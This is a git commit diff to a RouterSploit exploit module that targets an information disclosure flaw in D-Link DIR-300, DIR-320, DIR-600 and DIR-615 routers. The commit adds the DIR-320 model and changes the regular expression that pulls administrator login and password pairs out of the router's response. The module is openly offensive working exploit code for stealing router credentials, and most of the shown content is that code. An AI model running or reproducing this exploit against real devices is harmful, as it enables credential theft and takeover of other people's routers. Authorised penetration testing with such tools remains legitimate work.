Covering D-Link 320 devices with info disclosure exploit.

3b71264e · Marcin Bury · 955df5ec · 3b71264e
Commit 3b71264e authored May 30, 2016 by Marcin Bury
Show whitespace changes
Inline Side-by-side

Showing with 9 additions and 7 deletions

dir_300_320_600_615_info_disclosure.py ...les/exploits/dlink/dir_300_320_600_615_info_disclosure.py +9 -7

No files found.
--- a/routersploit/modules/exploits/dlink/dir_300_600_615_info_disclosure.py
+++ b/routersploit/modules/exploits/dlink/dir_300_600_615_info_disclosure.py
@@ -13,21 +13,23 @@ from routersploit import (
 class Exploit(exploits.Exploit):
    """
-    Exploit implementation for D-Link DIR-300, DIR-600, DIR-615 Information Disclosure vulnerability.
+    Exploit implementation for D-Link DIR-300, DIR-320, DIR-600, DIR-615 Information Disclosure vulnerability.
    If the target is vulnerable it allows to read credentials for administrator."
    """
    __info__ = {
-        'name': 'D-Link DIR-300 & DIR-600 & DIR-615 Info Disclosure',
+        'name': 'D-Link DIR-300 & DIR-320 & DIR-600 & DIR-615 Info Disclosure',
-        'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-600, DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
+        'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600, DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
        'authors': [
            'tytusromekiatomek <tytusromekiatomek[at]inbox.com>',  # vulnerability discovery
            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+            'Aleksandr Mikhaylov <chelaxe[at]gmail.com>',  # routersploit module
        ],
        'references': [
            'http://seclists.org/bugtraq/2013/Dec/11'
        ],
        'devices': [
            'D-Link DIR-300 (all)',
+            'D-Link DIR-320 (all)',
            'D-Link DIR-600 (all)',
            'D-Link DIR-615 (fw 4.0)',
        ],
@@ -43,10 +45,9 @@ class Exploit(exploits.Exploit):
        if response is None:
            return
-        creds = re.findall("<center>\t\t\t\n\t\t\t<table> <tr> <td>\n\t\t\t(.+?)\n\n\t\t\t</td>", response.text)
+        creds = re.findall("\n\t\t\t(.+?):(.+?)\n\n\t\t\t", response.text)
        if len(creds):
-            c = creds[0].split(":")
-            creds = [(c[0], c[1])]
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *creds)
@@ -61,7 +62,8 @@ class Exploit(exploits.Exploit):
        if response is None:
            return False  # target is not vulnerable
-        creds = re.findall("<center>\t\t\t\n\t\t\t<table> <tr> <td>\n\t\t\t(.+?)\n\n\t\t\t</td>", response.text)
+        creds = re.findall("\n\t\t\t(.+?):(.+?)\n\n\t\t\t", response.text)
        if len(creds):
            return True  # target is vulnerable